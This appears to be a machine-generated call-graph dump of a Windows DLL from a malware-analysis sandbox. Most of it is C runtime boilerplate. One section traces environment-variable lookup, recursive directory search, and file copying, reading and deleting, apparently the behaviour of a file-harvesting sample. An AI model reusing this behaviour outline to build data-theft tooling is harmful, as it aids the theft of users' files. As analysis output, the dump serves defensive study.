6298->6296 6302->6296 6307 21bdc80d 6303->6307 6304 21bdc835 GetModuleHandleA 6304->6307 6305 21bdc872 6306 21bdc85f GetProcAddress 6306->6307 6307->6304 6307->6305 6307->6306 6308 21bd21a1 ___scrt_dllmain_exception_filter 7352 21bd9d61 7353 21bd9d81 7352->7353 7356 21bd9db8 7353->7356 7355 21bd9dab 7357 21bd9dbf 7356->7357 7358 21bd9e20 7357->7358 7362 21bd9ddf 7357->7362 7360 21bda90e 7358->7360 7365 21bdaa17 7358->7365 7360->7355 7362->7360 7363 21bdaa17 21 API calls 7362->7363 7364 21bda93e 7363->7364 7364->7355 7366 21bdaa20 7365->7366 7369 21bdb19b 7366->7369 7370 21bdb1da __startOneArgErrorHandling 7369->7370 7375 21bdb25c __startOneArgErrorHandling 7370->7375 7379 21bdb59e 7370->7379 7372 21bdb286 7373 21bdb8b2 __startOneArgErrorHandling 20 API calls 7372->7373 7374 21bdb292 7372->7374 7373->7374 7377 21bd2ada _ValidateLocalCookies 5 API calls 7374->7377 7375->7372 7376 21bd78a3 __startOneArgErrorHandling 5 API calls 7375->7376 7376->7372 7378 21bd9e6e 7377->7378 7378->7355 7380 21bdb5c1 __raise_exc RaiseException 7379->7380 7381 21bdb5bc 7380->7381 7381->7375 6309 21bd81a0 6310 21bd81d9 6309->6310 6311 21bd81dd 6310->6311 6320 21bd8205 6310->6320 6312 21bd6368 _free 20 API calls 6311->6312 6314 21bd81e2 6312->6314 6313 21bd8529 6315 21bd2ada _ValidateLocalCookies 5 API calls 6313->6315 6316 21bd62ac _abort 26 API calls 6314->6316 6317 21bd8536 6315->6317 6318 21bd81ed 6316->6318 6319 21bd2ada _ValidateLocalCookies 5 API calls 6318->6319 6321 21bd81f9 6319->6321 6320->6313 6323 21bd80c0 6320->6323 6326 21bd80db 6323->6326 6324 21bd2ada _ValidateLocalCookies 5 API calls 6325 21bd8152 6324->6325 6325->6320 6326->6324 6754 21bda1e0 6757 21bda1fe 6754->6757 6756 21bda1f6 6759 21bda203 6757->6759 6761 21bda298 6759->6761 6762 21bdaa53 6759->6762 6761->6756 6763 21bdaa70 RtlDecodePointer 6762->6763 6765 21bdaa80 6762->6765 6763->6765 6764 21bd2ada _ValidateLocalCookies 5 API calls 6767 21bda42f 6764->6767 6766 21bdab0d 6765->6766 6768 21bdab02 6765->6768 6770 21bdaab7 6765->6770 6766->6768 6769 21bd6368 _free 20 API calls 6766->6769 6767->6756 6768->6764 6769->6768 6770->6768 6771 21bd6368 _free 20 API calls 6770->6771 6771->6768 7382 21bd7260 GetStartupInfoW 7383 21bd7318 7382->7383 7384 21bd7286 7382->7384 7384->7383 7385 21bd8be3 27 API calls 7384->7385 7386 21bd72af 7385->7386 7386->7383 7387 21bd72dd GetFileType 7386->7387 7387->7386 6772 21bd4bdd 6773 21bd4bec 6772->6773 6774 21bd4c08 6772->6774 6773->6774 6775 21bd4bf2 6773->6775 6776 21bd6d60 51 API calls 6774->6776 6777 21bd6368 _free 20 API calls 6775->6777 6778 21bd4c0f GetModuleFileNameA 6776->6778 6779 21bd4bf7 6777->6779 6780 21bd4c33 6778->6780 6781 21bd62ac _abort 26 API calls 6779->6781 6795 21bd4d01 6780->6795 6783 21bd4c01 6781->6783 6785 21bd4e76 20 API calls 6786 21bd4c5d 6785->6786 6787 21bd4c66 6786->6787 6788 21bd4c72 6786->6788 6789 21bd6368 _free 20 API calls 6787->6789 6790 21bd4d01 38 API calls 6788->6790 6794 21bd4c6b 6789->6794 6792 21bd4c88 6790->6792 6791 21bd571e _free 20 API calls 6791->6783 6793 21bd571e _free 20 API calls 6792->6793 6792->6794 6793->6794 6794->6791 6797 21bd4d26 6795->6797 6799 21bd4d86 6797->6799 6801 21bd70eb 6797->6801 6798 21bd4c50 6798->6785 6799->6798 6800 21bd70eb 38 API calls 6799->6800 6800->6799 6804 21bd7092 6801->6804 6805 21bd54a7 __fassign 38 API calls 6804->6805 6806 21bd70a6 6805->6806 6806->6797 7234 21bd281c 7237 21bd2882 7234->7237 7240 21bd3550 7237->7240 7239 21bd282a 7241 21bd355d 7240->7241 7244 21bd358a 7240->7244 7242 21bd47e5 ___std_exception_copy 21 API calls 7241->7242 7241->7244 7243 21bd357a 7242->7243 7243->7244 7245 21bd544d ___std_exception_copy 26 API calls 7243->7245 7244->7239 7245->7244 7246 21bd2418 7247 21bd2420 ___scrt_release_startup_lock 7246->7247 7250 21bd47f5 7247->7250 7249 21bd2448 7251 21bd4808 7250->7251 7252 21bd4804 7250->7252 7255 21bd4815 7251->7255 7252->7249 7256 21bd5b7a _abort 20 API calls 7255->7256 7259 21bd482c 7256->7259 7257 21bd2ada _ValidateLocalCookies 5 API calls 7258 21bd4811 7257->7258 7258->7249 7259->7257 5797 21bd1c5b 5798 21bd1c6b ___scrt_fastfail 5797->5798 5801 21bd12ee 5798->5801 5800 21bd1c87 5802 21bd1324 ___scrt_fastfail 5801->5802 5803 21bd13b7 GetEnvironmentVariableW 5802->5803 5827 21bd10f1 5803->5827 5806 21bd10f1 57 API calls 5807 21bd1465 5806->5807 5808 21bd10f1 57 API calls 5807->5808 5809 21bd1479 5808->5809 5810 21bd10f1 57 API calls 5809->5810 5811 21bd148d 5810->5811 5812 21bd10f1 57 API calls 5811->5812 5813 21bd14a1 5812->5813 5814 21bd10f1 57 API calls 5813->5814 5815 21bd14b5 lstrlenW 5814->5815 5816 21bd14d9 lstrlenW 5815->5816 5826 21bd14d2 5815->5826 5817 21bd10f1 57 API calls 5816->5817 5818 21bd1501 lstrlenW lstrcatW 5817->5818 5819 21bd10f1 57 API calls 5818->5819 5820 21bd1539 lstrlenW lstrcatW 5819->5820 5821 21bd10f1 57 API calls 5820->5821 5822 21bd156b lstrlenW lstrcatW 5821->5822 5823 21bd10f1 57 API calls 5822->5823 5824 21bd159d lstrlenW lstrcatW 5823->5824 5825 21bd10f1 57 API calls 5824->5825 5825->5826 5826->5800 5828 21bd1118 ___scrt_fastfail 5827->5828 5829 21bd1129 lstrlenW 5828->5829 5840 21bd2c40 5829->5840 5832 21bd1168 lstrlenW 5833 21bd1177 lstrlenW FindFirstFileW 5832->5833 5834 21bd11e1 5833->5834 5835 21bd11a0 5833->5835 5834->5806 5836 21bd11c7 FindNextFileW 5835->5836 5839 21bd11aa 5835->5839 5836->5835 5837 21bd11da FindClose 5836->5837 5837->5834 5839->5836 5842 21bd1000 5839->5842 5841 21bd1148 lstrcatW lstrlenW 5840->5841 5841->5832 5841->5833 5843 21bd1022 ___scrt_fastfail 5842->5843 5844 21bd10af 5843->5844 5845 21bd102f lstrcatW lstrlenW 5843->5845 5846 21bd10b5 lstrlenW 5844->5846 5858 21bd10ad 5844->5858 5847 21bd106b lstrlenW 5845->5847 5848 21bd105a lstrlenW 5845->5848 5873 21bd1e16 5846->5873 5859 21bd1e89 lstrlenW 5847->5859 5848->5847 5851 21bd10ca 5854 21bd1e89 5 API calls 5851->5854 5851->5858 5852 21bd1088 GetFileAttributesW 5853 21bd109c 5852->5853 5852->5858 5853->5858 5865 21bd173a 5853->5865 5855 21bd10df 5854->5855 5878 21bd11ea 5855->5878 5858->5839 5860 21bd2c40 ___scrt_fastfail 5859->5860 5861 21bd1ea7 lstrcatW lstrlenW 5860->5861 5862 21bd1ed1 lstrcatW 5861->5862 5863 21bd1ec2 5861->5863 5862->5852 5863->5862 5864 21bd1ec7 lstrlenW 5863->5864 5864->5862 5866 21bd1747 ___scrt_fastfail 5865->5866 5893 21bd1cca 5866->5893 5869 21bd199f 5869->5858 5871 21bd1824 ___scrt_fastfail _strlen 5871->5869 5913 21bd15da 5871->5913 5874 21bd1e29 5873->5874 5876 21bd1e4c 5873->5876 5875 21bd1e2d lstrlenW 5874->5875 5874->5876 5875->5876 5877 21bd1e3f lstrlenW 5875->5877 5876->5851 5877->5876 5879 21bd120e ___scrt_fastfail 5878->5879 5880 21bd1e89 5 API calls 5879->5880 5881 21bd1220 GetFileAttributesW 5880->5881 5882 21bd1235 5881->5882 5883 21bd1246 5881->5883 5882->5883 5885 21bd173a 35 API calls 5882->5885 5884 21bd1e89 5 API calls 5883->5884 5886 21bd1258 5884->5886 5885->5883 5887 21bd10f1 56 API calls 5886->5887 5888 21bd126d 5887->5888 5889 21bd1e89 5 API calls 5888->5889 5890 21bd127f ___scrt_fastfail 5889->5890 5891 21bd10f1 56 API calls 5890->5891 5892 21bd12e6 5891->5892 5892->5858 5894 21bd1cf1 ___scrt_fastfail 5893->5894 5895 21bd1d0f CopyFileW CreateFileW 5894->5895 5896 21bd1d55 GetFileSize 5895->5896 5897 21bd1d44 DeleteFileW 5895->5897 5898 21bd1ede 22 API calls 5896->5898 5902 21bd1808 5897->5902 5899 21bd1d66 ReadFile 5898->5899 5900 21bd1d7d CloseHandle DeleteFileW 5899->5900 5901 21bd1d94 CloseHandle DeleteFileW 5899->5901 5900->5902 5901->5902 5902->5869 5903 21bd1ede 5902->5903 5905 21bd222f 5903->5905 5906 21bd224e 5905->5906 5908 21bd2250 5905->5908 5921 21bd474f 5905->5921 5926 21bd47e5 5905->5926 5906->5871 5909 21bd2908 5908->5909 5933 21bd35d2 5908->5933 5910 21bd35d2 __CxxThrowException@8 RaiseException 5909->5910 5912 21bd2925 5910->5912 5912->5871 5914 21bd160c _strcat _strlen 5913->5914 5915 21bd163c lstrlenW 5914->5915 6021 21bd1c9d 5915->6021 5917 21bd1655 lstrcatW lstrlenW 5918 21bd1678 5917->5918 5919 21bd167e lstrcatW 5918->5919 5920 21bd1693 ___scrt_fastfail 5918->5920 5919->5920 5920->5871 5936 21bd4793 5921->5936 5923 21bd4765 5942 21bd2ada 5923->5942 5925 21bd478f 5925->5905 5932 21bd56d0 _abort 5926->5932 5927 21bd570e 5955 21bd6368 5927->5955 5929 21bd56f9 RtlAllocateHeap 5930 21bd570c 5929->5930 5929->5932 5930->5905 5931 21bd474f _abort 7 API calls 5931->5932 5932->5927 5932->5929 5932->5931 5935 21bd35f2 RaiseException 5933->5935 5935->5909 5937 21bd479f ___DestructExceptionObject 5936->5937 5949 21bd5671 RtlEnterCriticalSection 5937->5949 5939 21bd47aa 5950 21bd47dc 5939->5950 5941 21bd47d1 _abort 5941->5923 5943 21bd2ae5 IsProcessorFeaturePresent 5942->5943 5944 21bd2ae3 5942->5944 5946 21bd2b58 5943->5946 5944->5925 5954 21bd2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5946->5954 5948 21bd2c3b 5948->5925 5949->5939 5953 21bd56b9 RtlLeaveCriticalSection 5950->5953 5952 21bd47e3 5952->5941 5953->5952 5954->5948 5958 21bd5b7a GetLastError 5955->5958 5959 21bd5b99 5958->5959 5960 21bd5b93 5958->5960 5964 21bd5bf0 SetLastError 5959->5964 5984 21bd637b 5959->5984 5977 21bd5e08 5960->5977 5965 21bd5bf9 5964->5965 5965->5930 5966 21bd5bb3 5991 21bd571e 5966->5991 5970 21bd5bb9 5972 21bd5be7 SetLastError 5970->5972 5971 21bd5bcf 6004 21bd593c 5971->6004 5972->5965 5975 21bd571e _free 17 API calls 5976 21bd5be0 5975->5976 5976->5964 5976->5972 6009 21bd5c45 5977->6009 5979 21bd5e2f 5980 21bd5e47 TlsGetValue 5979->5980 5981 21bd5e3b 5979->5981 5980->5981 5982 21bd2ada _ValidateLocalCookies 5 API calls 5981->5982 5983 21bd5e58 5982->5983 5983->5959 5985 21bd6388 _abort 5984->5985 5986 21bd63c8 5985->5986 5987 21bd63b3 RtlAllocateHeap 5985->5987 5990 21bd474f _abort 7 API calls 5985->5990 5988 21bd6368 _free 19 API calls 5986->5988 5987->5985 5989 21bd5bab 5987->5989 5988->5989 5989->5966 5997 21bd5e5e 5989->5997 5990->5985 5992 21bd5729 HeapFree 5991->5992 5993 21bd5752 _free 5991->5993 5992->5993 5994 21bd573e 5992->5994 5993->5970 5995 21bd6368 _free 18 API calls 5994->5995 5996 21bd5744 GetLastError 5995->5996 5996->5993 5998 21bd5c45 _abort 5 API calls 5997->5998 5999 21bd5e85 5998->5999 6000 21bd5ea0 TlsSetValue 5999->6000 6001 21bd5e94 5999->6001 6000->6001 6002 21bd2ada _ValidateLocalCookies 5 API calls 6001->6002 6003 21bd5bc8 6002->6003 6003->5966 6003->5971 6015 21bd5914 6004->6015 6013 21bd5c71 6009->6013 6014 21bd5c75 __crt_fast_encode_pointer 6009->6014 6010 21bd5c95 6012 21bd5ca1 GetProcAddress 6010->6012 6010->6014 6011 21bd5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6011->6013 6012->6014 6013->6010 6013->6011 6013->6014 6014->5979 6016 21bd5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6015->6016 6017 21bd5938 6016->6017 6018 21bd58c4 6017->6018 6019 21bd5758 _abort 20 API calls 6018->6019 6020 21bd58e8 6019->6020 6020->5975 6022 21bd1ca6 _strlen 6021->6022 6022->5917 6807 21bd20db 6808 21bd20e7 ___DestructExceptionObject 6807->6808 6809 21bd2110 dllmain_raw 6808->6809 6814 21bd210b 6808->6814 6818 21bd20f6 6808->6818 6810 21bd212a 6809->6810 6809->6818 6820 21bd1eec 6810->6820 6812 21bd2177 6813 21bd1eec 31 API calls 6812->6813 6812->6818 6815 21bd218a 6813->6815 6814->6812 6817 21bd1eec 31 API calls 6814->6817 6814->6818 6816 21bd2193 dllmain_raw 6815->6816 6815->6818 6816->6818 6819 21bd216d dllmain_raw 6817->6819 6819->6812 6821 21bd1f2a dllmain_crt_process_detach 6820->6821 6822 21bd1ef7 6820->6822 6826 21bd1f06 6821->6826 6823 21bd1f1c dllmain_crt_process_attach 6822->6823 6824 21bd1efc 6822->6824 6823->6826 6825 21bd1f12 6824->6825 6827 21bd1f01 6824->6827 6835 21bd23ec 6825->6835 6826->6814 6827->6826 6830 21bd240b 6827->6830 6843 21bd53e5 6830->6843 6954 21bd3513 6835->6954 6840 21bd2408 6840->6826 6841 21bd351e 7 API calls 6842 21bd23f5 6841->6842 6842->6826 6849 21bd5aca 6843->6849 6846 21bd351e 6925 21bd3820 6846->6925 6848 21bd2415 6848->6826 6850 21bd5ad4 6849->6850 6853 21bd2410 6849->6853 6851 21bd5e08 _abort 11 API calls 6850->6851 6852 21bd5adb 6851->6852 6852->6853 6854 21bd5e5e _abort 11 API calls 6852->6854 6853->6846 6855 21bd5aee 6854->6855 6857 21bd59b5 6855->6857 6858 21bd59c0 6857->6858 6859 21bd59d0 6857->6859 6863 21bd59d6 6858->6863 6859->6853 6862 21bd571e _free 20 API calls 6862->6859 6864 21bd59e9 6863->6864 6865 21bd59ef 6863->6865 6866 21bd571e _free 20 API calls 6864->6866 6867 21bd571e _free 20 API calls 6865->6867 6866->6865 6868 21bd59fb 6867->6868 6869 21bd571e _free 20 API calls 6868->6869 6870 21bd5a06 6869->6870 6871 21bd571e _free 20 API calls 6870->6871 6872 21bd5a11 6871->6872 6873 21bd571e _free 20 API calls 6872->6873 6874 21bd5a1c 6873->6874 6875 21bd571e _free 20 API calls 6874->6875 6876 21bd5a27 6875->6876 6877 21bd571e _free 20 API calls 6876->6877 6878 21bd5a32 6877->6878 6879 21bd571e _free 20 API calls 6878->6879 6880 21bd5a3d 6879->6880 6881 21bd571e _free 20 API calls 6880->6881 6882 21bd5a48 6881->6882 6883 21bd571e _free 20 API calls 6882->6883 6884 21bd5a56 6883->6884 6889 21bd589c 6884->6889 6895 21bd57a8 6889->6895 6891 21bd58c0 6892 21bd58ec 6891->6892 6908 21bd5809 6892->6908 6894 21bd5910 6894->6862 6896 21bd57b4 ___DestructExceptionObject 6895->6896 6903 21bd5671 RtlEnterCriticalSection 6896->6903 6898 21bd57be 6901 21bd571e _free 20 API calls 6898->6901 6902 21bd57e8 6898->6902 6900 21bd57f5 _abort 6900->6891 6901->6902 6904 21bd57fd 6902->6904 6903->6898 6907 21bd56b9 RtlLeaveCriticalSection 6904->6907 6906 21bd5807 6906->6900 6907->6906 6909 21bd5815 ___DestructExceptionObject 6908->6909 6916 21bd5671 RtlEnterCriticalSection 6909->6916 6911 21bd581f 6917 21bd5a7f 6911->6917 6913 21bd5832 6921 21bd5848 6913->6921 6915 21bd5840 _abort 6915->6894 6916->6911 6918 21bd5ab5 __fassign 6917->6918 6919 21bd5a8e __fassign 6917->6919 6918->6913 6919->6918 6920 21bd7cc2 __fassign 20 API calls 6919->6920 6920->6918 6924 21bd56b9 RtlLeaveCriticalSection 6921->6924 6923 21bd5852 6923->6915 6924->6923 6926 21bd382d 6925->6926 6930 21bd384b ___vcrt_freefls@4 6925->6930 6927 21bd383b 6926->6927 6931 21bd3b67 6926->6931 6936 21bd3ba2 6927->6936 6930->6848 6941 21bd3a82 6931->6941 6933 21bd3b81 6934 21bd3b8d 6933->6934 6935 21bd3b99 TlsGetValue 6933->6935 6934->6927 6935->6934 6937 21bd3a82 try_get_function 5 API calls 6936->6937 6938 21bd3bbc 6937->6938 6939 21bd3bd7 TlsSetValue 6938->6939 6940 21bd3bcb 6938->6940 6939->6940 6940->6930 6942 21bd3aaa 6941->6942 6943 21bd3aa6 __crt_fast_encode_pointer 6941->6943 6942->6943 6947 21bd39be 6942->6947 6943->6933 6946 21bd3ac4 GetProcAddress 6946->6943 6948 21bd39cd try_get_first_available_module 6947->6948 6949 21bd3a77 6948->6949 6950 21bd39ea LoadLibraryExW 6948->6950 6952 21bd3a60 FreeLibrary 6948->6952 6953 21bd3a38 LoadLibraryExW 6948->6953 6949->6943 6949->6946 6950->6948 6951 21bd3a05 GetLastError 6950->6951 6951->6948 6952->6948 6953->6948 6960 21bd3856 6954->6960 6956 21bd23f1 6956->6842 6957 21bd53da 6956->6957 6958 21bd5b7a _abort 20 API calls 6957->6958 6959 21bd23fd 6958->6959 6959->6840 6959->6841 6961 21bd385f 6960->6961 6962 21bd3862 GetLastError 6960->6962 6961->6956 6963 21bd3b67 ___vcrt_FlsGetValue 6 API calls 6962->6963 6964 21bd3877 6963->6964 6965 21bd38dc SetLastError 6964->6965 6966 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6964->6966 6971 21bd3896 6964->6971 6965->6956 6967 21bd3890 6966->6967 6969 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6967->6969 6970 21bd38b8 6967->6970 6967->6971 6968 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 6968->6971 6969->6970 6970->6968 6970->6971 6971->6965 6327 21bd4a9a 6328 21bd5411 38 API calls 6327->6328 6329 21bd4aa2 6328->6329 6972 21bd73d5 6973 21bd73e1 ___DestructExceptionObject 6972->6973 6984 21bd5671 RtlEnterCriticalSection 6973->6984 6975 21bd73e8 6985 21bd8be3 6975->6985 6977 21bd73f7 6978 21bd7406 6977->6978 6998 21bd7269 GetStartupInfoW 6977->6998 7009 21bd7422 6978->7009 6982 21bd7417 _abort 6984->6975 6986 21bd8bef ___DestructExceptionObject 6985->6986 6987 21bd8bfc 6986->6987 6988 21bd8c13 6986->6988 6990 21bd6368 _free 20 API calls 6987->6990 7012 21bd5671 RtlEnterCriticalSection 6988->7012 6991 21bd8c01 6990->6991 6992 21bd62ac _abort 26 API calls 6991->6992 6993 21bd8c0b _abort 6992->6993 6993->6977 6994 21bd8c4b 7020 21bd8c72 6994->7020 6995 21bd8c1f 6995->6994 7013 21bd8b34 6995->7013 6999 21bd7318 6998->6999 7000 21bd7286 6998->7000 7004 21bd731f 6999->7004 7000->6999 7001 21bd8be3 27 API calls 7000->7001 7002 21bd72af 7001->7002 7002->6999 7003 21bd72dd GetFileType 7002->7003 7003->7002 7005 21bd7326 7004->7005 7006 21bd7369 GetStdHandle 7005->7006 7007 21bd73d1 7005->7007 7008 21bd737c GetFileType 7005->7008 7006->7005 7007->6978 7008->7005 7024 21bd56b9 RtlLeaveCriticalSection 7009->7024 7011 21bd7429 7011->6982 7012->6995 7014 21bd637b _abort 20 API calls 7013->7014 7017 21bd8b46 7014->7017 7015 21bd8b53 7016 21bd571e _free 20 API calls 7015->7016 7018 21bd8ba5 7016->7018 7017->7015 7019 21bd5eb7 11 API calls 7017->7019 7018->6995 7019->7017 7023 21bd56b9 RtlLeaveCriticalSection 7020->7023 7022 21bd8c79 7022->6993 7023->7022 7024->7011 7025 21bd4ed7 7026 21bd6d60 51 API calls 7025->7026 7027 21bd4ee9 7026->7027 7036 21bd7153 GetEnvironmentStringsW 7027->7036 7031 21bd4eff 7034 21bd571e _free 20 API calls 7031->7034 7032 21bd571e _free 20 API calls 7033 21bd4f29 7032->7033 7035 21bd4ef4 7034->7035 7035->7032 7037 21bd716a 7036->7037 7038 21bd71bd 7036->7038 7041 21bd7170 WideCharToMultiByte 7037->7041 7039 21bd4eee 7038->7039 7040 21bd71c6 FreeEnvironmentStringsW 7038->7040 7039->7035 7048 21bd4f2f 7039->7048 7040->7039 7041->7038 7042 21bd718c 7041->7042 7043 21bd56d0 21 API calls 7042->7043 7044 21bd7192 7043->7044 7045 21bd7199 WideCharToMultiByte 7044->7045 7046 21bd71af 7044->7046 7045->7046 7047 21bd571e _free 20 API calls 7046->7047 7047->7038 7049 21bd4f44 7048->7049 7050 21bd637b _abort 20 API calls 7049->7050 7060 21bd4f6b 7050->7060 7051 21bd4fcf 7052 21bd571e _free 20 API calls 7051->7052 7053 21bd4fe9 7052->7053 7053->7031 7054 21bd637b _abort 20 API calls 7054->7060 7055 21bd4fd1 7056 21bd5000 20 API calls 7055->7056 7058 21bd4fd7 7056->7058 7061 21bd571e _free 20 API calls 7058->7061 7059 21bd4ff3 7062 21bd62bc _abort 11 API calls 7059->7062 7060->7051 7060->7054 7060->7055 7060->7059 7063 21bd571e _free 20 API calls 7060->7063 7065 21bd544d 7060->7065 7061->7051 7064 21bd4fff 7062->7064 7063->7060 7066 21bd5468 7065->7066 7067 21bd545a 7065->7067 7068 21bd6368 _free 20 API calls 7066->7068 7067->7066 7070 21bd547f 7067->7070 7073 21bd5470 7068->7073 7069 21bd62ac _abort 26 API calls 7071 21bd547a 7069->7071 7070->7071 7072 21bd6368 _free 20 API calls 7070->7072 7071->7060 7072->7073 7073->7069 7388 21bd5351 7389 21bd5360 7388->7389 7393 21bd5374 7388->7393 7391 21bd571e _free 20 API calls 7389->7391 7389->7393 7390 21bd571e _free 20 API calls 7392 21bd5386 7390->7392 7391->7393 7394 21bd571e _free 20 API calls 7392->7394 7393->7390 7395 21bd5399 7394->7395 7396 21bd571e _free 20 API calls 7395->7396 7397 21bd53aa 7396->7397 7398 21bd571e _free 20 API calls 7397->7398 7399 21bd53bb 7398->7399 6330 21bd3c90 RtlUnwind 7074 21bd36d0 7075 21bd36e2 7074->7075 7077 21bd36f0 @_EH4_CallFilterFunc@8 7074->7077 7076 21bd2ada _ValidateLocalCookies 5 API calls 7075->7076 7076->7077 7260 21bd220c 7261 21bd221a dllmain_dispatch 7260->7261 7262 21bd2215 7260->7262 7264 21bd22b1 7262->7264 7265 21bd22c7 7264->7265 7267 21bd22d0 7265->7267 7268 21bd2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7265->7268 7267->7261 7268->7267 7400 21bd284f 7401 21bd2882 std::exception::exception 27 API calls 7400->7401 7402 21bd285d 7401->7402 7403 21bd724e GetProcessHeap 6331 21bd8a89 6334 21bd6d60 6331->6334 6335 21bd6d69 6334->6335 6336 21bd6d72 6334->6336 6338 21bd6c5f 6335->6338 6339 21bd5af6 _abort 38 API calls 6338->6339 6340 21bd6c6c 6339->6340 6358 21bd6d7e 6340->6358 6342 21bd6c74 6367 21bd69f3 6342->6367 6345 21bd6c8b 6345->6336 6346 21bd56d0 21 API calls 6347 21bd6c9c 6346->6347 6353 21bd6cce 6347->6353 6374 21bd6e20 6347->6374 6349 21bd571e _free 20 API calls 6349->6345 6351 21bd6cc9 6352 21bd6368 _free 20 API calls 6351->6352 6352->6353 6353->6349 6354 21bd6ce6 6355 21bd571e _free 20 API calls 6354->6355 6356 21bd6d12 6354->6356 6355->6356 6356->6353 6384 21bd68c9 6356->6384 6359 21bd6d8a ___DestructExceptionObject 6358->6359 6360 21bd5af6 _abort 38 API calls 6359->6360 6365 21bd6d94 6360->6365 6362 21bd6e18 _abort 6362->6342 6363 21bd55a8 _abort 38 API calls 6363->6365 6365->6362 6365->6363 6366 21bd571e _free 20 API calls 6365->6366 6387 21bd5671 RtlEnterCriticalSection 6365->6387 6388 21bd6e0f 6365->6388 6366->6365 6392 21bd54a7 6367->6392 6370 21bd6a14 GetOEMCP 6372 21bd6a3d 6370->6372 6371 21bd6a26 6371->6372 6373 21bd6a2b GetACP 6371->6373 6372->6345 6372->6346 6373->6372 6375 21bd69f3 40 API calls 6374->6375 6376 21bd6e3f 6375->6376 6379 21bd6e90 IsValidCodePage 6376->6379 6381 21bd6e46 6376->6381 6383 21bd6eb5 ___scrt_fastfail 6376->6383 6377 21bd2ada _ValidateLocalCookies 5 API calls 6378 21bd6cc1 6377->6378 6378->6351 6378->6354 6380 21bd6ea2 GetCPInfo 6379->6380 6379->6381 6380->6381 6380->6383 6381->6377 6539 21bd6acb GetCPInfo 6383->6539 6612 21bd6886 6384->6612 6386 21bd68ed 6386->6353 6387->6365 6391 21bd56b9 RtlLeaveCriticalSection 6388->6391 6390 21bd6e16 6390->6365 6391->6390 6393 21bd54c4 6392->6393 6394 21bd54ba 6392->6394 6393->6394 6395 21bd5af6 _abort 38 API calls 6393->6395 6394->6370 6394->6371 6396 21bd54e5 6395->6396 6400 21bd7a00 6396->6400 6401 21bd54fe 6400->6401 6402 21bd7a13 6400->6402 6404 21bd7a2d 6401->6404 6402->6401 6408 21bd7f0f 6402->6408 6405 21bd7a55 6404->6405 6406 21bd7a40 6404->6406 6405->6394 6406->6405 6407 21bd6d7e __fassign 38 API calls 6406->6407 6407->6405 6409 21bd7f1b ___DestructExceptionObject 6408->6409 6410 21bd5af6 _abort 38 API calls 6409->6410 6411 21bd7f24 6410->6411 6419 21bd7f72 _abort 6411->6419 6420 21bd5671 RtlEnterCriticalSection 6411->6420 6413 21bd7f42 6421 21bd7f86 6413->6421 6418 21bd55a8 _abort 38 API calls 6418->6419 6419->6401 6420->6413 6422 21bd7f94 __fassign 6421->6422 6424 21bd7f56 6421->6424 6422->6424 6428 21bd7cc2 6422->6428 6425 21bd7f75 6424->6425 6538 21bd56b9 RtlLeaveCriticalSection 6425->6538 6427 21bd7f69 6427->6418 6427->6419 6429 21bd7d42 6428->6429 6434 21bd7cd8 6428->6434 6430 21bd7d90 6429->6430 6432 21bd571e _free 20 API calls 6429->6432 6496 21bd7e35 6430->6496 6435 21bd7d64 6432->6435 6433 21bd7d0b 6436 21bd7d2d 6433->6436 6444 21bd571e _free 20 API calls 6433->6444 6434->6429 6434->6433 6439 21bd571e _free 20 API calls 6434->6439 6437 21bd571e _free 20 API calls 6435->6437 6438 21bd571e _free 20 API calls 6436->6438 6440 21bd7d77 6437->6440 6441 21bd7d37 6438->6441 6443 21bd7d00 6439->6443 6445 21bd571e _free 20 API calls 6440->6445 6446 21bd571e _free 20 API calls 6441->6446 6442 21bd7dfe 6447 21bd571e _free 20 API calls 6442->6447 6456 21bd90ba 6443->6456 6449 21bd7d22 6444->6449 6450 21bd7d85 6445->6450 6446->6429 6451 21bd7e04 6447->6451 6484 21bd91b8 6449->6484 6454 21bd571e _free 20 API calls 6450->6454 6451->6424 6452 21bd7d9e 6452->6442 6455 21bd571e 20 API calls _free 6452->6455 6454->6430 6455->6452 6457 21bd90cb 6456->6457 6483 21bd91b4 6456->6483 6458 21bd90dc 6457->6458 6459 21bd571e _free 20 API calls 6457->6459 6460 21bd90ee 6458->6460 6461 21bd571e _free 20 API calls 6458->6461 6459->6458 6462 21bd571e _free 20 API calls 6460->6462 6463 21bd9100 6460->6463 6461->6460 6462->6463 6464 21bd571e _free 20 API calls 6463->6464 6465 21bd9112 6463->6465 6464->6465 6466 21bd571e _free 20 API calls 6465->6466 6468 21bd9124 6465->6468 6466->6468 6467 21bd9136 6470 21bd9148 6467->6470 6471 21bd571e _free 20 API calls 6467->6471 6468->6467 6469 21bd571e _free 20 API calls 6468->6469 6469->6467 6472 21bd915a 6470->6472 6474 21bd571e _free 20 API calls 6470->6474 6471->6470 6473 21bd916c 6472->6473 6475 21bd571e _free 20 API calls 6472->6475 6476 21bd917e 6473->6476 6477 21bd571e _free 20 API calls 6473->6477 6474->6472 6475->6473 6478 21bd9190 6476->6478 6479 21bd571e _free 20 API calls 6476->6479 6477->6476 6480 21bd91a2 6478->6480 6481 21bd571e _free 20 API calls 6478->6481 6479->6478 6482 21bd571e _free 20 API calls 6480->6482 6480->6483 6481->6480 6482->6483 6483->6433 6485 21bd91c5 6484->6485 6495 21bd921d 6484->6495 6486 21bd91d5 6485->6486 6488 21bd571e _free 20 API calls 6485->6488 6487 21bd91e7 6486->6487 6489 21bd571e _free 20 API calls 6486->6489 6490 21bd91f9 6487->6490 6491 21bd571e _free 20 API calls 6487->6491 6488->6486 6489->6487 6492 21bd571e _free 20 API calls 6490->6492 6493 21bd920b 6490->6493 6491->6490 6492->6493 6494 21bd571e _free 20 API calls 6493->6494 6493->6495 6494->6495 6495->6436 6497 21bd7e42 6496->6497 6501 21bd7e60 6496->6501 6497->6501 6502 21bd925d 6497->6502 6500 21bd571e _free 20 API calls 6500->6501 6501->6452 6503 21bd7e5a 6502->6503 6504 21bd926e 6502->6504 6503->6500 6505 21bd9221 __fassign 20 API calls 6504->6505 6506 21bd9276 6505->6506 6507 21bd9221 __fassign 20 API calls 6506->6507 6508 21bd9281 6507->6508 6509 21bd9221 __fassign 20 API calls 6508->6509 6510 21bd928c 6509->6510 6511 21bd9221 __fassign 20 API calls 6510->6511 6512 21bd9297 6511->6512 6513 21bd9221 __fassign 20 API calls 